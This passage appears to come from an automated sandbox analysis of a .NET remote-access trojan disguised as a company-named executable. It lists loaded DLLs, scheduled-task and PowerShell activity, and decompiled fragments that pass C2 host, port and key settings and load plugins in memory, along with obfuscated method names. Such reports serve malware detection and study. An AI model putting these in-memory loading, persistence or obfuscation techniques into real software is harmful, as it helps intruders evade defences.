              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..lnk.9.drLNK file: ..\..\..\..\..\SS Bottmac Engineers Pvt. Ltd..exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
              Source: Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

              Data Obfuscation

              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs .Net Code: Memory
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.7830000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs .Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4175ad0.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs .Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs .Net Code: Memory
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_0786852F push edx; iretd 0_2_0786854A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_0786854B push edx; iretd 0_2_07868552
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868C31 push edi; iretd 0_2_07868C32
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868BBF push esi; iretd 0_2_07868BC2
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868B2B push esi; iretd 0_2_07868B32
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868B29 push esi; iretd 0_2_07868B2A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868AE8 push esi; iretd 0_2_07868AEA
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868A07 push ebp; iretd 0_2_07868A0A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07869A6B pushad ; iretd 0_2_07869A72
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07869A69 pushad ; iretd 0_2_07869A6A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_078699F0 pushad ; iretd 0_2_078699F2
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 0_2_07868919 push esp; iretd 0_2_0786891A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 9_2_03185880 push esp; iretd 9_2_03185CE9
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 9_2_0318E2A0 push es; ret 9_2_0318E2B6
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Code function: 9_2_0318E2C0 push es; ret 9_2_0318E2D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_04E5634D push eax; ret 12_2_04E56361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_07CC5EB2 push FFFFFF8Bh; iretd 12_2_07CC5EBB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_07CC5E79 push FFFFFF8Bh; iretd 12_2_07CC5E82
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04E715CD push ebx; ret 17_2_04E715DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04E7B07C push ebp; ret 17_2_04E7B093
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04E7B178 push esp; ret 17_2_04E7B19B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04E7633D push eax; ret 17_2_04E76351
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_04E76D33 pushfd ; ret 17_2_04E76D3A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02B3634D push eax; ret 20_2_02B36361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_084973E8 push eax; retf 20_2_084973E9
              Source: SS Bottmac Engineers Pvt. Ltd..exe Static PE information: section name: .text entropy: 7.459719521334949
              Source: RTUZKYTc.exe.0.dr Static PE information: section name: .text entropy: 7.459719521334949
              Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr Static PE information: section name: .text entropy: 7.459719521334949
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, z0CgWreVct1ReW3hxU.cs High entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, nlbUxk0n9w0SE2fT7Q.cs High entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OZMP2hxHpjh7kQFAPP.cs High entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, CrrfYkO0sG17BJWtfW5.cs High entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, xqcOSno5WVFAjguVYG.cs High entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, Uuj6qeW9tPXjBmNpHg.cs High entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gv9ulKIH2QRgfIOudI.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, MBp5MtOrZjC7IY1p5BK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gsQB8HRrROaMJigu8D.cs High entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jVOKqx6OHHAubw6pMN.cs High entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs High entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dJa6sC2NfcTNVggMrM.cs High entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, vBXDN7cPr3ZGX8ky0g.cs High entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LuuKNTdSfqNmEuA9vR.cs High entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.cs High entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LwbRpltv1eAnYuONRA.cs High entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, rWZZ7wHORJniJhaBFo.cs High entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OM9lZPwkAKr27WGp6r.cs High entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jO1kLrkP6ITRPB9nRt.csHigh entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.csHigh entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, GXpMZGv1DYx8eclQhb.csHigh entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, ibRWnPCp5Mnp1nfdT7.csHigh entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, z0CgWreVct1ReW3hxU.csHigh entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, nlbUxk0n9w0SE2fT7Q.csHigh entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OZMP2hxHpjh7kQFAPP.csHigh entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, CrrfYkO0sG17BJWtfW5.csHigh entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, xqcOSno5WVFAjguVYG.csHigh entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, Uuj6qeW9tPXjBmNpHg.csHigh entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gv9ulKIH2QRgfIOudI.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, MBp5MtOrZjC7IY1p5BK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gsQB8HRrROaMJigu8D.csHigh entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jVOKqx6OHHAubw6pMN.csHigh entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csHigh entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dJa6sC2NfcTNVggMrM.csHigh entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, vBXDN7cPr3ZGX8ky0g.csHigh entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LuuKNTdSfqNmEuA9vR.csHigh entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.csHigh entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LwbRpltv1eAnYuONRA.csHigh entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, rWZZ7wHORJniJhaBFo.csHigh entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OM9lZPwkAKr27WGp6r.csHigh entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
